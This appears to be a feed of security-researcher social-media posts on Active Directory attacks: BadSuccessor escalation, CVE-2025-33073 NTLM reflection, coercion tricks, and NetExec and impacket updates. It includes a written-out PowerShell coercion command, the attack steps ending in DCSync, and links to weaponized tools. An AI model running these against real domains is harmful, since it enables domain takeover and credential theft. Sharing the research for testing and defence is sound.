Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ? Simply use: powershell iwr http://192.168.56.1 -UseDefaultCredentials To get an HTTP coerce of the machine account. 👇🧵

1. Create a dMSA object (badmsa$) under sacrificial VulnOU and targeting Administrator identity. (you need a user with at least CreateChild privilege over an OU) 2. Request a service ticket as badmsa$ 3. Retrieved ticket contains superseded identity's groups 4. DCSync

BadSuccessor in python with bloodyAD Have fun :D linkedin.com/feed/update/ur…

Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥 github.com/Pennyw0rth/Net…

The original BadSuccessor research by Yuval Gordon was too good to ignore, I couldn't wait to replicate it in my lab. I wrote a short post on operationalizing the technique with real-world, stealthy abuse paths. medium.com/p/429cefc36187

I'm super happy to announce an operationally weaponized version of Yuval Gordon's BadSuccessor in .NET format! With a minimum of "CreateChild" privileges over any OU it allows for automatic escalation to Domain Admin (DA). Enjoy your inline .NET execution! github.com/logangoins/Sha…

Exploiting BadSuccessor from A to Z with NT hash of impersonated accounts using bloodyAD v2.1.16 github.com/CravateRouge/b…

NetExec now has native checks for LDAP signing and channel binding capabilities of the target DC, thanks to the implementation of Thomas Seigneuret 🚀 I also fixed querying LDAP with non-ASCII characters, so you can finally query groups such as "Dämonen-Administratoren"🎉

Newer Windows clients often enforce signing ✍️ when using SMB fileshares. To quickly deploy an SMB server with signing supported we implemented this in impacket's smbserver.py based on a prior work by drm. github.com/fortra/impacke…

I left a server online with VNC wide open to see how it would be interacted with. This is one of the more interesting interactions:

Microsoft just released the patch for CVE-2025-33073, a critical vulnerability allowing a standard user to remotely compromise any machine with SMB signing not enforced! Checkout the details in the blogpost by Guillaume André and Wil. synacktiv.com/publications/n…

I'm not sure everyone realizes it, but as it stands, if you have an Active Directory with default configurations, any machine (except DCs) that hasn't applied the June 10 patch can be compromised by any domain user.

x.com/RedTeamPT/stat… The efsr_spray module is merged in #NetExec. If you want to coerce an up-to-date Windows 11 and you have a writable share, this will come handy 😎. Thanks for the PR !

CVE-2025-33073 is really insane 🤯 Reproduce this attack in GOAD in 3 commands. x.com/Synacktiv/stat…

PoC Exploit for the NTLM reflection SMB flaw CVE-2025-33073 github.com/mverschu/CVE-2…

Yes, LLMs don’t think. Apple’s paper shows they fail at logic. But they guess so well, they already outperform mediocre white-collar work – junior coding, copywriting, design, even legal boilerplate. The risk isn’t in jobs that require real thinking. It’s in the ones where

Introducing the BloodHound Query Library! 📚 Martin Sohn & Joey Dreijer explore the new collection of Cypher queries designed to help BloodHound users to unlock the full potential of the BloodHound platform by creating an open query ecosystem. ghst.ly/4jTgRQQ

#HuntingTipOfTheDay: @OddvarMoe of TrustedSec shows how you can run a full C2 implant from Outlook - just setting a few registry keys does the trick. Any activity concerning these registry keys should be consider suspicious. Full story here: youtu.be/7MDHhavM5GM

The incredibly talented gentleman behind pypykatz, minikerberos, msldap, and jackdaw (to name a few) is currently looking for a new opportunity🚒retweet for exposure, best of luck my man!🫶